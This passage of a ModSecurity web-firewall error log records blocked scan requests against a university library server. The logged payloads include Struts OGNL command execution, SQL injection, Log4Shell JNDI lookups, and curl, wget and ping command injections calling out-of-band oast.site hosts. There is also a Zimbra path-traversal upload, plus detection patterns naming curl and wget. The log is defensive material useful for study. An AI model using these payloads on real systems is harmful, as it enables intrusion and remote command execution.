"2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "digilibfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAANsAmUAAAAD"]
[Tue Aug 29 11:33:51.362726 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "digilibfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAARQ4DMAAAAB"]
[Tue Aug 29 11:33:52.311662 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAAQKOqAAAAAs"]
[Tue Aug 29 11:33:52.529642 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "digilibfh.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARtADAAAAAV"]
[Tue Aug 29 11:33:53.292567 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgpmd37y3zrnmm5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAARtADYAAAAV"]
[Tue Aug 29 11:33:53.323407 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg5tf6cuw9thicr.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAAR@KJ4AAAAF"]
[Tue Aug 29 11:33:53.380064 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "digilibfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAARdiNkAAAAK"]
[Tue Aug 29 11:33:54.382373 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAARQ4EkAAAAB"]
[Tue Aug 29 11:33:54.420039 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "digilibfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAARjjT0AAAAL"]
[Tue Aug 29 11:33:55.348010 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "digilibfh.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAAPDoLIAAAAP"]
[Tue Aug 29 11:33:55.592301 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAAPDoLgAAAAP"]
[Tue Aug 29 11:33:57.407290 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgr15b3b8jst4ox.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-28AAAAb"]
[Tue Aug 29 11:33:57.613173 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "digilibfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASHh4oAAAAD"]
[Tue Aug 29 11:33:58.028126 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAARxOtIAAAAa"]
[Tue Aug 29 11:33:59.100216 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASOUoMAAAAR"]
[Tue Aug 29 11:33:59.321557 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASNzn0AAAAQ"]
[Tue Aug 29 11:34:00.380846 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASPDJcAAAAS"]
[Tue Aug 29 11:34:01.425041 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAARjjUwAAAAL"]
[Tue Aug 29 11:34:03.364730 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg5uy78ztqepeff.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASUXzoAAAAd"]
[Tue Aug 29 11:34:04.389118 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgp3ai91wc3zd9n.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASUX0AAAAAd"]
[Tue Aug 29 11:34:06.400102 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAARjjVAAAAAL"]
[Tue Aug 29 11:34:07.307502 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASAHgAAAAAH"]
[Tue Aug 29 11:34:07.328320 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAARtAEoAAAAV"]
[Tue Aug 29 11:34:08.315816 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASLqCkAAAAM"]
[Tue Aug 29 11:34:08.329313 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAARQ4F4AAAAB"]
[Tue Aug 29 11:34:08.376726 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAARjjVYAAAAL"]
[Tue Aug 29 11:34:09.307331 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAAPDoMgAAAAP"]
